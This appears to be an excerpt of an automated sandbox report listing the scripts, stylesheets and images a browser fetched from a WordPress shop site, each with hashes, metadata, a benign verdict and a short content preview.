                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"3",. . "macros":[{"function":"__e"},{"function":"__e"},{"function":"__c","vtp_value":"G-2LEWGZ9NK3"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.affiliation"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.value"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.tax"},{"function":"__v","vtp_dataLayerVersion":1,"vtp_setDefaultValue":false,"vtp_name":"ecommerce"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.transaction_id"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"ecommerce.shipping"},{"function":"__jsm","vtp_javascript":["template","(function(){var a=",
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (64065)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):74131
                                                                                                          Entropy (8bit):5.302888336520099
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:0j7s37GZ2v3hcBMIy3NVc6aBGBokOl/NlRBqAK8m7lLv8qRtnT2H2cURROySp5oC:0z23hrIy3+kOZLk3R5KHQR2n
                                                                                                          MD5:2AEB34B78FC3FB4FF7ED2CE4934169B0
                                                                                                          SHA1:2E034A7F0D0DABD31467A8312C7EE85CAD3E4FF2
                                                                                                          SHA-256:738B1C2950FC6B172FBDAC8007E29EBD840552030251DC7E233F4AF794AA9960
                                                                                                          SHA-512:334DB8CA5B29D2F58E21630B1E3A7ADF0FEAA6DA942E854100117A36678C1E1919701ADF7200C96DB602B2B4A5569285109C66A5EB810B946C136FB0BCF6DDA2
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * Select2 4.0.3. * https://select2.github.io. *. * Released under the MIT license. * https://github.com/select2/select2/blob/master/LICENSE.md. */.!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?e(require("jquery")):e(jQuery)}(function(t){var e,n,d,s,r,p,h,f,g,m,y,i,o,v,a=((u=t&&t.fn&&t.fn.select2&&t.fn.select2.amd?t.fn.select2.amd:u)&&u.requirejs||(u?n=u:u={},f={},g={},m={},y={},i=Object.prototype.hasOwnProperty,o=[].slice,v=/\.js$/,p=function(e,t){var n,i,o=c(e),s=o[0];return e=o[1],s&&(n=b(s=l(s,t))),s?e=n&&n.normalize?n.normalize(e,(i=t,function(e){return l(e,i)})):l(e,t):(s=(o=c(e=l(e,t)))[0],e=o[1],s&&(n=b(s))),{f:s?s+"!"+e:e,n:e,pr:s,p:n}},h={require:function(e){return w(e)},exports:function(e){var t=f[e];return void 0!==t?t:f[e]={}},module:function(e){return{id:e,uri:"",exports:f[e],config:(t=e,function(){return m&&m.config&&m.config[t]||{}})};var t}},s=function(e,t,n,i){var o,s,r,a,l,c=[],u=typeof n;if(i=i||e,"undefined"==u
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (4933), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):4933
                                                                                                          Entropy (8bit):4.903210630269961
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Wne5FOp0KWdy74n3M58bIdbuli8LaKdWBlQiBlABlZFGWxa+QSCOnuxeimFFz8s:WnCAp0Kgy7QM58bgiSW289
                                                                                                          MD5:E372DF47BD19E1563B557D7BDB817188
                                                                                                          SHA1:4EFDF4050A78BDBD88AA255955B7423105895DD0
                                                                                                          SHA-256:4B7693154069C53A16468D09D89C9EBA5DA6C0DFC69CF4D7EB675E32BA663361
                                                                                                          SHA-512:38BC75BF085413258BB8929641980CFAC58A4792D70EDCD409938B195ADD3C2C78862D90622132E21B364F862E2DEFD7C879B81F96D6608F448DA4C2628DFF0E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors-style.css?ver=7.6.2
                                                                                                          Preview:.components-custom-select-control{position:relative}.components-custom-select-control__label{display:block;margin-bottom:8px}.components-custom-select-control__button{border:1px solid #757575;border-radius:2px;min-height:30px;min-width:130px;position:relative;text-align:left}.components-custom-select-control__button.components-custom-select-control__button{padding-right:24px}.components-custom-select-control__button:focus:not(:disabled){border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 1px var(--wp-admin-theme-color)}.components-custom-select-control__button .components-custom-select-control__button-icon{height:100%;padding:0;position:absolute;right:0;top:0}.components-custom-select-control__menu{border:1px solid #1e1e1e;background-color:#fff;border-radius:2px;outline:none;transition:none;max-height:400px;min-width:100%;overflow:auto;padding:0;position:absolute;z-index:1000000}.components-custom-select-control__menu[aria-hidden=true]{display:none}.components-custom-select-contr
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2139), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2139
                                                                                                          Entropy (8bit):4.957392272918885
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:zXMZh1EJeJ89v5ubevJJQaAE8H63yR01e5p3gN3Ydhen+25DKYIokOYuLHSQfI41:PvpZAzH6iR0snQpNn+25ezoOqLwTG
                                                                                                          MD5:B72C1CBB1530A011A27BD9800F26765A
                                                                                                          SHA1:27B825C5D8255F33B8427A059D4545EBD65E1746
                                                                                                          SHA-256:A256FCCECAC3B32AB73C91D79A18747519A1A18023BE05465C933B03523A82E8
                                                                                                          SHA-512:63FEBB24BDB65C39ACC8D355DC5B20D3A1AD94AFC347AB2936C543D8B7A911C2F6D2C1C0146707CDB29BEA85A8F34E7FB6E76AAEE4BC0BEA212EA58835A58025
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=6.6.1
                                                                                                          Preview:jQuery(function(s){s(".woocommerce-ordering").on("change","select.orderby",function(){s(this).closest("form").trigger("submit")}),s("input.qty:not(.product-quantity input.qty)").each(function(){var o=parseFloat(s(this).attr("min"));0<=o&&parseFloat(s(this).val())<o&&s(this).val(o)});var e="store_notice"+(s(".woocommerce-store-notice").data("noticeId")||"");"hidden"===Cookies.get(e)?s(".woocommerce-store-notice").hide():s(".woocommerce-store-notice").show(),s(".woocommerce-store-notice__dismiss-link").on("click",function(o){Cookies.set(e,"hidden",{path:"/"}),s(".woocommerce-store-notice").hide(),o.preventDefault()}),s(".woocommerce-input-wrapper span.description").length&&s(document.body).on("click",function(){s(".woocommerce-input-wrapper span.description:visible").prop("aria-hidden",!0).slideUp(250)}),s(".woocommerce-input-wrapper").on("click",function(o){o.stopPropagation()}),s(".woocommerce-input-wrapper :input").on("keydown",function(o){var e=s(this).parent().find("span.description
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (5082)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):5125
                                                                                                          Entropy (8bit):5.463271316022447
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:BZN1YdL61YHU69GP29uMT+DhrDvlw6NV2LUVcOxjefbGOjD0vD862:/N0L61YHUhoRsr5NkQdxakQ62
                                                                                                          MD5:FE22279E3C53818E1349FACDC06D87BE
                                                                                                          SHA1:5226C06CD30967301E0DE0ECC5FB935B060BD768
                                                                                                          SHA-256:5B53E811E2F70AAE99B19DDE4E877B98382A294A0727B2C8AB788BA030E858C9
                                                                                                          SHA-512:9E26F6FFEA34C1BDE51251C344413B529B8E3D020FE4BCE75DF506F5650DA5BE9E763A31D0A10D2CCE1FC05C5A464F1F57920A47E0BF606CF05970653E0863F4
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.6.4
                                                                                                          Preview:/*! elementor-pro - v3.6.4 - 15-03-2022 */.(()=>{"use strict";var e,r,_,a={},c={};function __webpack_require__(e){var r=c[e];if(void 0!==r)return r.exports;var _=c[e]={exports:{}};return a[e](_,_.exports,__webpack_require__),_.exports}__webpack_require__.m=a,e=[],__webpack_require__.O=(r,_,a,c)=>{if(!_){var n=1/0;for(u=0;u<e.length;u++){for(var[_,a,c]=e[u],i=!0,t=0;t<_.length;t++)(!1&c||n>=c)&&Object.keys(__webpack_require__.O).every((e=>__webpack_require__.O[e](_[t])))?_.splice(t--,1):(i=!1,c<n&&(n=c));if(i){e.splice(u--,1);var o=a();void 0!==o&&(r=o)}}return r}c=c||0;for(var u=e.length;u>0&&e[u-1][2]>c;u--)e[u]=e[u-1];e[u]=[_,a,c]},__webpack_require__.f={},__webpack_require__.e=e=>Promise.all(Object.keys(__webpack_require__.f).reduce(((r,_)=>(__webpack_require__.f[_](e,r),r)),[])),__webpack_require__.u=e=>714===e?"code-highlight.28a979661569ddbbf60d.bundle.min.js":721===e?"video-playlist.e85695d7b9171d89c565.bundle.min.js":256===e?"paypal-button.3d0d5af7df85963df32c.bundle.min.js":24
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (9139)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9533
                                                                                                          Entropy (8bit):5.393453483611794
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:x9RHfGTArT7TMcPvRwY7A1uKigDDptgMIOP9+HxlP722DIrNrDc:x9RGTArf4cPqY7YhR9thIOPcRF72YsA
                                                                                                          MD5:87C54EDF7DAD7DFDFDE015F6EEE45FF1
                                                                                                          SHA1:96EC1A06EA3093C47E1E2FC4444ADA7F4456135D
                                                                                                          SHA-256:EF22199864042B8CEEEE3729F3254C140DF7217364045737CA3AADF8434FB3DA
                                                                                                          SHA-512:5C3565BB7C80CBEBEFFD3A0A413DF03FB264EF2D2B2F7CAEAAA29B828081F6DB95EF6FE5C1D64A988D5885DEA699A7E9D112393A745A445990008A99CCD5DE9F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * jQuery blockUI plugin. * Version 2.70.0-2014.11.23. * Requires jQuery v1.7 or later. *. * Examples at: http://malsup.com/jquery/block/. * Copyright (c) 2007-2013 M. Alsup. * Dual licensed under the MIT and GPL licenses:. * http://www.opensource.org/licenses/mit-license.php. * http://www.gnu.org/licenses/gpl.html. *. * Thanks to Amir-Hossein Sobhi for some excellent contributions!. */.!function(){"use strict";function e(p){p.fn._fadeIn=p.fn.fadeIn;var b=p.noop||function(){},h=/MSIE/.test(navigator.userAgent),k=/MSIE 6.0/.test(navigator.userAgent)&&!/MSIE 8.0/.test(navigator.userAgent),y=(document.documentMode,"function"==typeof document.createElement("div").style.setExpression&&document.createElement("div").style.setExpression);p.blockUI=function(e){o(window,e)},p.unblockUI=function(e){v(window,e)},p.growlUI=function(e,t,o,n){var i=p('<div class="growlUI"></div>');e&&i.append("<h1>"+e+"</h1>"),t&&i.append("<h2>"+t+"</h2>"),o===undefined&&(o=3e3);var s=function(e){p.blockUI({messa
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 7680 x 4320, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2477461
                                                                                                          Entropy (8bit):7.680552273115579
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:49152:rw7RmuhNxNo8sxCZUfy2IGPL+bZLiPHp1Cybcyayi/aFtV1bo0S1PjATrDB/31Xb:+RmuhXND0CZU8UK+PHp0Byli/aFtV1bb
                                                                                                          MD5:5B60672DE6B0AE6171FA790B9BB1BA8C
                                                                                                          SHA1:5D2C22CF5CA06EA0DCA7FD7C5E1ECE0CBA975F65
                                                                                                          SHA-256:3C99502F3893AD75AB4040645A0C2C8D2F8183A0414776922213F149AC9D0964
                                                                                                          SHA-512:991973D83631DF824DE1DE820F6FC605F165B330E135DA696291792811889CDBF81961DFB618EBDBB0E862E837B8970BB2B8D93D1E0F7081AE811E2962DA8828
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR.....................pHYs..,J..,J.wztM.. .IDATx....r.L..X...U.....z.....z-.=..+.t.E........A.........?.."x...t......d.."<Me|C...G....+s0......t..y...,....._.....<y<..i,./....MSy..z[..%.o]{....=.(..3...V.\..=.....)._.W..q,.....:|,...[.|.A..u...1.{...g...,.....?u...2.....)....c..qj.G_..g..2f{^2?...._./q~.7UG...1_f.g....y}...+N...._.?.......[._3....I.'..9_....1._..u....8.o.x...Z..!..q..G9..n..Y....3...ky......3...s..s<t1_..W.....[...Z..2.....".....#..........}.U........<..{.x.g=.]v...u..5.....>..V........._.{.....^.....F....mm....W....em.k?...k.......m}.z...~z..8......X...&.?......Nk...j...[._...K[.7...4...{..k..J.o[..9.....xd.W..`...^}.......~........-k..~.......r..j........[.]......i..../fk....U.._..?~.V.].~.g..........<}...........n}.st{...,..~...w..~m{.]......7_..o}....o........k...5~..9z~:.......w......-..N............................../..................................~................................q....<.'.C....y...8N
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):43
                                                                                                          Entropy (8bit):2.7374910194847146
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:CU9yltxlHh/:m/
                                                                                                          MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                          SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                          SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                          SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://mc.yandex.com/metrika/advert.gif
                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2894
                                                                                                          Entropy (8bit):5.130108035080603
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:HrjSTxswDB/P7LUS0BvpKkR2/HSXmpgMPnfFrYHe1rcYlX3orrkdEv4Hm6Hid:HC+2/Vpb/flue1pFdEv4Hmo0
                                                                                                          MD5:3FD2AFA98866679439097F4AB102FE0A
                                                                                                          SHA1:DBC9C4139E49D0D9FB41B7191AAD1A2DB6C555FD
                                                                                                          SHA-256:CCD31FFA708D025833F954B3E0560CEDD58DF9A0D2706B2CCEE5F501C5B2467B
                                                                                                          SHA-512:82811EF42ABD80CBEBD4A74D35475FC3871478FC25A486B08BB7E04921B7824DB56C56B2191E9AB56A421552B483A2E64F966396711E5F248AFAE9D1DED22CB2
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.9.6
                                                                                                          Preview:.wpcf7 .screen-reader-response {..position: absolute;..overflow: hidden;..clip: rect(1px, 1px, 1px, 1px);..clip-path: inset(50%);..height: 1px;..width: 1px;..margin: -1px;..padding: 0;..border: 0;..word-wrap: normal !important;.}...wpcf7 form .wpcf7-response-output {..margin: 2em 0.5em 1em;..padding: 0.2em 1em;..border: 2px solid #00a0d2; /* Blue */.}...wpcf7 form.init .wpcf7-response-output,..wpcf7 form.resetting .wpcf7-response-output,..wpcf7 form.submitting .wpcf7-response-output {..display: none;.}...wpcf7 form.sent .wpcf7-response-output {..border-color: #46b450; /* Green */.}...wpcf7 form.failed .wpcf7-response-output,..wpcf7 form.aborted .wpcf7-response-output {..border-color: #dc3232; /* Red */.}...wpcf7 form.spam .wpcf7-response-output {..border-color: #f56e28; /* Orange */.}...wpcf7 form.invalid .wpcf7-response-output,..wpcf7 form.unaccepted .wpcf7-response-output,..wpcf7 form.payment-required .wpcf7-response-output {..border-color: #ffb900; /* Yellow */.}...wpcf7-form-contro
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):9411
                                                                                                          Entropy (8bit):5.251857364756606
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:aYBPmCHNDYPy2TL4TmPtFbIFLDP4Q58Nn:aYBPmCHNDYPy2TUTmPtFbIFLDP4Q58Nn
                                                                                                          MD5:89011CB8A67973BDB2AF05D77875C56C
                                                                                                          SHA1:5B16C5B3034D33146532880780670618643A3A8B
                                                                                                          SHA-256:67F8E6963A39ABD3BF34F503B033A21021E4314C73AD1EDF8918B0EE84E7D462
                                                                                                          SHA-512:2D5AFA7047EA33CB21738A8D0CB0B20EA1AF026649E3B5EDD5988EE8BB3C9D5F272E0C5721081EAA0F02E9BD63D4288F54937303B968B6ABB9D943FFD4968A44
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/show-hidecollapse-expand/assets/css/bg-show-hide.css?ver=6.7.1
                                                                                                          Preview:/* Back-end css */.i.mce-i-icon {. font: 400 20px/1 dashicons;..color: #e02b20 !important;. padding: 0;. vertical-align: top;. speak: none;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;. margin-left: -2px;. padding-right: 2px.}../* Front-end css */.[id ^= bg-showmore-hidden] {..display: none;..padding-top: 15px;.}...bg-margin-for-link {..margin-bottom: initial; .}..[id ^= bg-showmore-hidden] .bg-margin-for-link {..margin-bottom: 0em; .}..a[id ^= bg-showmore-action], a[id ^= bg-showmore-action]:focus {..outline: none;.}..button.bg-green-button {..-moz-box-shadow:inset 0px 1px 0px 0px #caefab;..-webkit-box-shadow:inset 0px 1px 0px 0px #caefab;..box-shadow:inset 0px 1px 0px 0px #caefab;..background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #77d42a), color-stop(1, #5cb811));..background:-moz-linear-gradient(top, #77d42a 5%, #5cb811 100%);..background:-webkit-linear-gradient(top, #77d42a 5%, #5cb811 100%);..backgrou
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2938), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2938
                                                                                                          Entropy (8bit):4.989368196764261
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:oiu6oNl0R9SxGkYK2ITm5mej11i/nOrIkX6OLbf1i/u/apqWt01i/qXR4yQENlF0:c2rBBL6Yw/U5Fe
                                                                                                          MD5:0FD625C3991A4015814CFFDC88E2FC82
                                                                                                          SHA1:D7C2F53E058210FF3EA773297641008BAB71A5F3
                                                                                                          SHA-256:2D022DB650D194D935FAEA46A40E5512235B43BC3F8B181E32CE6D3DD745F4E1
                                                                                                          SHA-512:B936B4E596739DE1FA708A9F439167D4C2E670228A88A803363AA65F061B29DD9F52FDCD5AAB1C1DCBBC634A779E54F767640B2BAF30025130B5EA4FC6169631
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=6.6.1
                                                                                                          Preview:jQuery(function(r){if("undefined"==typeof wc_cart_fragments_params)return!1;var t=!0,o=wc_cart_fragments_params.cart_hash_key;try{t="sessionStorage"in window&&null!==window.sessionStorage,window.sessionStorage.setItem("wc","test"),window.sessionStorage.removeItem("wc"),window.localStorage.setItem("wc","test"),window.localStorage.removeItem("wc")}catch(f){t=!1}function a(){t&&sessionStorage.setItem("wc_cart_created",(new Date).getTime())}function s(e){t&&(localStorage.setItem(o,e),sessionStorage.setItem(o,e))}var e={url:wc_cart_fragments_params.wc_ajax_url.toString().replace("%%endpoint%%","get_refreshed_fragments"),type:"POST",data:{time:(new Date).getTime()},timeout:wc_cart_fragments_params.request_timeout,success:function(e){e&&e.fragments&&(r.each(e.fragments,function(e,t){r(e).replaceWith(t)}),t&&(sessionStorage.setItem(wc_cart_fragments_params.fragment_name,JSON.stringify(e.fragments)),s(e.cart_hash),e.cart_hash&&a()),r(document.body).trigger("wc_fragments_refreshed"))},error:func
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (343)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):47022
                                                                                                          Entropy (8bit):4.191716823089285
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:KXVwFYcKI2qmW57vTvTepgYWMOO8g2QQ2ncYnsZydTngvS1XmKCfd:uVwFY9qmW577ypGO8gbncYns01XmKCfd
                                                                                                          MD5:C8BCA704A3B7D6455566376D42EB63E6
                                                                                                          SHA1:9389F63FDD52C81E99FDA08233094A2008DEE8A6
                                                                                                          SHA-256:40CC3ED05635E77032BEDE8682A49313A2238D0023C753327A9FE22AB8595B96
                                                                                                          SHA-512:91240898683169CA42177A53D9C513BD3C5AB52893AD450D0F855BA55013975D35B15AB42C33C11F05DCC9A21DD4FCECA82D87B0F0C5F3C18211436720B02570
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/themes/ciena/assets/js/theme.js?ver=1.0.8
                                                                                                          Preview:(function ($) {. "use strict";. var $window = $( window ),. $document = $( document ),. $body = $( 'body' );. var CIENA = CIENA || {};. CIENA.init = function () {. var _t = this;. _t.offCanvas();. _t.stickyHeader();. _t.stickyHeaderMobile();. _t.Vertical_Header();. _t.Announcement();. _t.CountDown();. _t.SwiperInit();. _t.woo_quantily();. _t.Search();. _t.Live_Search();. _t.FillterBtn();. _t.ToggleSubMenu();. _t.productThumbnailZoom();. _t.woofPagination();. _t.WL_update();. _t.Category_background();. _t.fullpage();. _t.InputState();. _t.Scroll_To_top();. _t.stickyAtc();. _t.Select2Init();. _t.ToggleBlockDropdown();. _t.loginPanelAuthenticate();. setTimeout(function () {. _t.Middle_Arrow();. _t.woofClearButton();. _t.checkScrollbar();. _t.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3417
                                                                                                          Entropy (8bit):4.720593575324692
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Kf7TtFFGRZEFrDGHEFl8nhYCth7HMl7MhpuMJf:Kf7TtFFGRZEFrDGHEFl8nh1thToohpuE
                                                                                                          MD5:A5B2995D05355AF729CDE2B6B0FBDFAB
                                                                                                          SHA1:AEE05E6ED41B531C753CA6C6C564C1FD31377B40
                                                                                                          SHA-256:92D4C7E119674BA3A44DDF403CE01859245EEB43309C6101DF0AB7AB7DDC8E63
                                                                                                          SHA-512:FA2BEC157AB48FB5DFF569F29D6C47A5A7D8772800F78110856037E1C4CE29A74C9007A3438A53900AD2BE335C42F0367F5344A395D641FC81C4DCCF9D9CA389
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:"use strict";.function woof_init_radios() {. if (icheck_skin != 'none') {. jQuery('.woof_radio_term').iCheck('destroy');.. jQuery('.woof_radio_term').iCheck({. radioClass: 'iradio_' + icheck_skin.skin + '-' + icheck_skin.color, . });.. jQuery('.woof_radio_term').off('ifChecked');. jQuery('.woof_radio_term').on('ifChecked', function (event) {. jQuery(this).attr("checked", true);. jQuery(this).parents('.woof_list').find('.woof_radio_term_reset').removeClass('woof_radio_term_reset_visible');. jQuery(this).parents('.woof_list').find('.woof_radio_term_reset').hide();. jQuery(this).parents('li').eq(0).find('.woof_radio_term_reset').eq(0).addClass('woof_radio_term_reset_visible');. var slug = jQuery(this).data('slug');. var name = jQuery(this).attr('name');. var term_id = jQuery(this).data('term-id');. woof_radio_direct_search(term_id, name, slug);.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (1182), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1182
                                                                                                          Entropy (8bit):4.855857319928605
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:QIcXrf8XJINTJ9gLDVN0GNFi9H8p8fk1E4jJfzvK19H8Y8FKy9H8j8u:QJ7f8XJWTJ9qDP0gFiFh45zSuI
                                                                                                          MD5:A65A757380C2BA19AC2A4D515C5F704D
                                                                                                          SHA1:EBA112B9928BF8DBEF9894291340FCA895FCAE22
                                                                                                          SHA-256:EBBCD297A73D3D6C96E90559A379D32F2B69C74032CD0952982852E969382ACA
                                                                                                          SHA-512:D3F52A51A5ED197EC74768062D7F029D489A32025CB9D02B02A71A0F7D5BA6B034E99A4301A3FDCC1972CA584CC97C1A6321B33E19D67319E756FA4840334524
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/elementor/css/post-403.css?ver=1709081757
                                                                                                          Preview:.elementor-kit-403{--e-global-color-primary:#97D1DC;--e-global-color-secondary:#54595F;--e-global-color-text:#7A7A7A;--e-global-color-accent:#61CE70;--e-global-typography-primary-font-family:"Roboto";--e-global-typography-primary-font-weight:600;--e-global-typography-secondary-font-family:"Roboto Slab";--e-global-typography-secondary-font-weight:400;--e-global-typography-text-font-family:"Roboto";--e-global-typography-text-font-weight:400;--e-global-typography-accent-font-family:"Roboto";--e-global-typography-accent-font-weight:500;}.elementor-section.elementor-section-boxed > .elementor-container{max-width:1140px;}.e-container{--container-max-width:1140px;}.elementor-widget:not(:last-child){margin-bottom:20px;}.elementor-element{--widgets-spacing:20px;}{}h1.entry-title{display:var(--page-title-display);}.elementor-kit-403 e-page-transition{background-color:#FFBC7D;}@media(max-width:1024px){.elementor-section.elementor-section-boxed > .elementor-container{max-width:1024px;}.e-container
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 3236 x 1388, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):78597
                                                                                                          Entropy (8bit):7.356715458451207
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:ikeftg6k86229/TuqRU2KaTye0GmO1ihv2F3bSICwCRUcdw5b0QowTtM:Feu6kflTvp9TTXmxhv2Fr7CecW5tTtM
                                                                                                          MD5:1A4FD5C8E63CA02ECEA3BDC328CD8A29
                                                                                                          SHA1:467FD2E36B0D900F672C17DA3C9753E35E3BE15F
                                                                                                          SHA-256:3F1E81E4AB0288BEA1A59B1A63E0650418E04426DD3EF30B826AD1D668649290
                                                                                                          SHA-512:36C361018C6A5E2A46705A8E3015E4FE48E245689D9F21F654B692F78100531557157E988FDB84E29F1A29D3A2F61FB1B6D02B9BFF3918ECE4FBEAF8B4746027
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2021/09/logo.pnbianco.png
                                                                                                          Preview:.PNG........IHDR.......l......,......bKGD..............pHYs...#...#.x.?v....tIME........q.... .IDATx....ud7.'..q.......mA.Z0Z.V.t....`..L...z..`H.H....>G.?U$2I..~.9zR.....|.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`R.............q..s......13_T.....X.@......Kj.]G...%".T.C.F...O...G..Zk%"~r..:O?E.O^.g..c.........z......*.....3.H.....`9......T
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3826
                                                                                                          Entropy (8bit):4.329716798048804
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:pEMH4252DyPsDmOV4IyNR1bpI9MYhax93Lq3cmWG:qMYQ4HV4IyNR9pFYhY93G3cml
                                                                                                          MD5:D27023098DBE1701B23B3BDDDA5D7B97
                                                                                                          SHA1:AD3B5CE9F16CF2DB43FBDA0F31449BCB7F1B467C
                                                                                                          SHA-256:4BFE601DAF3AEADD7095B0F5709B4DB2538F88653D7140F21D376D4263801D92
                                                                                                          SHA-512:9218E83F79B20EF6BD8D299E4C841FABF39E077287E40BFCCF52CD7A0C391E39EB543F5E34F770A89999E0D53E635FB535E0A2912F303C91E5B5731FA3C06914
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:;(function ($) {. "use strict"; // Start of use strict. /* ---------------------------------------------. Resize mega menu. --------------------------------------------- */. function responsive_megamenu_item(container, element) {. if ( container != 'undefined' ) {. var container_width = 0,. container_offset = container.offset();.. if ( typeof container_offset != 'undefined' ) {. container_width = container.innerWidth();. setTimeout(function () {. $(element).children('.mega-menu-container').css({'max-width': container_width + 'px'});. var sub_menu_width = $(element).children('.mega-menu-container').outerWidth(),. item_width = $(element).outerWidth();. $(element).children('.mega-menu-container').css({'left': '-' + (sub_menu_width / 2 - item_width / 2) + 'px'});. var container_left = container_of
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 82", progressive, precision 8, 2560x1440, components 3
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):409772
                                                                                                          Entropy (8bit):7.9715050160079
                                                                                                          Encrypted:false
